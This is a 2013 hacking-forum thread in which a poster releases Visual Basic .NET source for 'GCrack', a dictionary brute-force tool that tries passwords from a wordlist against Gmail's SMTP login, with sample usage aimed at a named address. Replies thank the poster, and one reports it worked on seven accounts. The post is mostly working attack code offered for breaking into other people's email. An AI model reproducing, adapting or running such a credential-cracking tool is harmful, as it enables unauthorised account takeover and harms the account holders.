Sinisterly
[Release] [Source] GCrack - Crack GMail passwords - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Visual Basic & .NET Framework (https://sinister.ly/Forum-Visual-Basic-NET-Framework)
+--- Thread: [Release] [Source] GCrack - Crack GMail passwords (/Thread-Release-Source-GCrack-Crack-GMail-passwords)



[Release] [Source] GCrack - Crack GMail passwords - SQLi - 05-17-2013

GCrack - Crack GMail passwords

Introduction
Hello again SL. I'm just releasing a program that bruteforces gmail accounts. It uses a dictionary attack, and it validates the account by attempting to send an email. I measured how fast it tries 1k passwords, and it's estimated to 1k attempts each 10 minutes. But it might vary depending on your bandwidth and/or hardware.

Screenshot
[Image: id6PoCACRjbjj.jpg]

Source
GCrack.vb Wrote:Imports System.Net.Mail
Imports System.IO
Imports System.Windows.Forms

Public Class GCrack
Private Shared Function Check(ByVal Email As String, ByVal Password As String) As Boolean
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(Email)
MyMailMessage.To.Add(Email)
MyMailMessage.Subject = "x"
MyMailMessage.Body = "x"
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(Email, Password)
SMTPServer.EnableSsl = True
Try
SMTPServer.Send(MyMailMessage)
Return True
Catch ex As SmtpException
Return False
End Try
End Function

Public Shared Function Crack(ByVal Address As String, ByVal File As String) As String
Dim Found As Boolean = False
Using SR As New StreamReader(Application.StartupPath & "\" & File)
Do While SR.Peek >= 0 And found = False
Dim line As String = SR.ReadLine()
If Check(Address, line) Then
Found = True
Return line
End If
Loop
End Using
Return Nothing
End Function
End Class

Example usage Wrote:Dim Response As String = GCrack.Crack("obama@Gmail.com", "list.txt")
If Response <> Nothing Then
Console.Writeline("The password is: " & Response)
End If

Download & virus scan
http://www.mediafire.com/
http://virustotal.com/


RE: [Release] [Source] GCrack - Crack GMail passwords - ErroraBorealis - 05-17-2013

Well shit, I was going to make one of these. Just with a gui. Oh well.


RE: [Release] [Source] GCrack - Crack GMail passwords - ねこまっしぐら - 05-17-2013

Oh man, thanks for the share :-) This looks neat.


RE: [Release] [Source] GCrack - Crack GMail passwords - Mxdaraexe - 05-17-2013

Since you don't feel like uploading a scan of the program, I'll run this through anubis and upload the results...


RE: [Release] [Source] GCrack - Crack GMail passwords - SQLi - 05-17-2013

(05-17-2013, 04:28 AM)Mxdaraexe Wrote: Since you don't feel like uploading a scan of the program, I'll run this through anubis and upload the results...

Or you could just have asked me.

Edit: Added scans in OP.


RE: [Release] [Source] GCrack - Crack GMail passwords - Sapientia - 05-17-2013

Well it seems pretty neat and good, nice job.


RE: [Release] [Source] GCrack - Crack GMail passwords - shizelkid - 05-17-2013

Nice, i tested it with 7 different accounts and it worked. Thank you.


RE: [Release] [Source] GCrack - Crack GMail passwords - Customer - 05-17-2013

I'm glad you shared this. (: